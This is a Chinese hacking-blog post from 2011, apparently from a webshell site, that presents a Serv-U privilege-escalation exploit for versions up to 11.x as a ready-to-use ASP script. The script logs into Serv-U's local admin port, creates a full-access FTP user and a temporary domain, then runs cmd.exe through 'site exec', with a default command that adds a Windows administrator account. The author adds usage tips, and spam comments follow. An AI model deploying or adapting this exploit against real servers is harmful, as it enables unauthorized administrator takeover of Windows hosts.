serv-u最新通杀所有版本0day包括11.x

分类:安全 | 2011-10-10 | 撸过 70 次
2人扯谈

serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的,

不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。

要不容易出错的。

EXP:

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
    '----------自定义参数开始-----------

action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
organizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")

    '----------自定义参数结束-----------

select case action

case 1
   returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1227081437828","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")
   sessionid=getmidstr("<sessionid>","</sessionid>",returns)
   if sessionid<>"" then
   Response.Write "login ok!"&"</br>"
   Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
   else
   Response.Write "error!"&"</br>"
   end if

case 2
   call main2()

case 3
   returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)
   organizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
   organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
   if organizationId<>"" then
   Response.write "get organizationId "&OrganizationId&" ok!"&"</br>"
   Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId
                else
   Response.write "error!"&"</br>"
   end if

case 4
   call main3()

case 5
   returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/XML/User.xml?Command=AddObject&Object=COrganization."&OrganizationId&".User&Temp=1&Sync=1227081437828","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)
   userid=getmidstr("<var name=""ObjectID"" val=""",""" />",returns)
   if userid<>"" then
   Response.write "get userid "&userid&" ok!"&"</br>"
   Response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId&"&userid="&userid
   else
   Response.write "error!"
   end if

case 6
   call main4()

case 7
   returns=httpopen("Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=AddObject&Object=CUser."&userid&".DirAccess&Sync=1227081437828","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)
   returns=httpopen("LoginID="&user&"&FullName=&Password="&pass&"&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2FC%3A&HomeDir=%2F"&path&"&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization."&OrganizationId&".User."&userid&"&Sync=1227081437828","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)
   Response.write "add user ok!"&"</br>"
   Response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId

case 8
   call main5()

case 9
   returns=httpopen("DomainName="&mydomain&"&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort="&ftpport&"&FTPSPort=990&SSHPort=22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=ObjectCommand&Object=CServer.0.CreateDomain&Sync=1227081437828","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)
   domainid=getmidstr("<ObjectID>","</ObjectID>",returns)
   Response.write "create domain ok!"&"</br>"
   Response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid

case 10
   call main6()

case 11
   set b=Server.CreateObject("Microsoft.XMLHTTP")
   b.open "GET", "http://127.0.0.1:"&ftpport&"/", false, "", ""
   b.send "User " & user & vbCrLf & "pass "& pass & vbCrLf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbCrLf & "QUIT" & vbCrLf
   Response.Write Replace(b.responseText,chr(13),"<br>")
   Response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid

case 12
   call main7()

case 13
   returns=httpopen("IDs="&domainid&"&","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=DeleteObject&Object=CServer.0.Domain&Sync=1227081437828","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)
   Response.Write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&"</br>"

case else
   call main1()

end select

sub main1()
%>
<form id="form1" name="form1" method="post" action="?action=1">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第一步:获取sessionid</strong></td>
    </tr>
    <tr>
      <td align="right">管理端口:</td>
      <td><input name="port" type="text" id="port" value="43958" /></td>
    </tr>
    <tr>
      <td align="right">管理员密码:</td>
      <td><input name="loginpass" type="text" id="loginpass" value="1" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p>
<%
end sub
%>
<% sub main2() %>

<form id="form1" name="form1" method="post" action="?action=3&sessionid=<%=sessionid%>&port=<%=port%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第二步:获取OrganizationId</strong></td>
    </tr>

    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>这一步有点慢,请等待.</strong></p>

<% end sub %>
<% sub main3() %>

<form id="form1" name="form1" method="post" action="?action=5&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第三步:获取userid</strong></td>
    </tr>

    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main4() %>

<form id="form1" name="form1" method="post" action="?action=7&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>&userid=<%=userid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第四步:加用户</strong></td>
    </tr>
    <tr>
      <td align="right">新ftp账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
      <td align="right">新ftp密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">系统路径:</td>
      <td><input name="path" type="text" id="path" value="c:" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main5() %>

<form id="form1" name="form1" method="post" action="?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第五步:创建域</strong></td>
    </tr>
    <tr>
      <td align="right">要添加的域:</td>
      <td><input name="mydomain" type="text" id="mydomain" value="testhack" /></td>
    </tr>
    <tr>
      <td align="right">域端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main6() %>

<form id="form1" name="form1" method="post" action="?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>执行命令</strong></td>
    </tr>

    <tr>
      <td align="right">FTP账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
        <tr>
      <td align="right">FTP密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">FTP端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td align="right">你的语句:</td>
      <td><input name="cmd" type="text" id="cmd" value="net user admin admin123456 /add&net localgroup administrators admin /add" size="80" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
      </td>
    </tr>
</table>
</form>
<p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p>
<p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p>


<% end sub %>
<% sub main7() %>

<form id="form1" name="form1" method="post" action="?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>删除临时域</strong></td>
    </tr>

    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<% end sub %>;
本站内容均为原创,转载请务必保留署名与链接!
serv-u最新通杀所有版本0day包括11.x:https://www.webshell.cc/1777.html
标签:

相关日志

  1. Hey there would you mind letting me know which hosting company you’re working with? I’ve loaded your blog in 3 different browsers and I must say this blog loads a lot quicker then most. Can you suggest a good hosting provider at a honest price? Thanks a lot, I appreciate it!

  2. I am starting up a new internet blog directory and was wondering if I can submit your site? I’m hoping to grow my directory gradually by hand so that it maintains good quality. I’ll make sure and put your blog in the correct category and I’ll additionally use, “” as your anchor text. Please make sure to let me know if this is acceptable with you by contacting me at:. Thankyou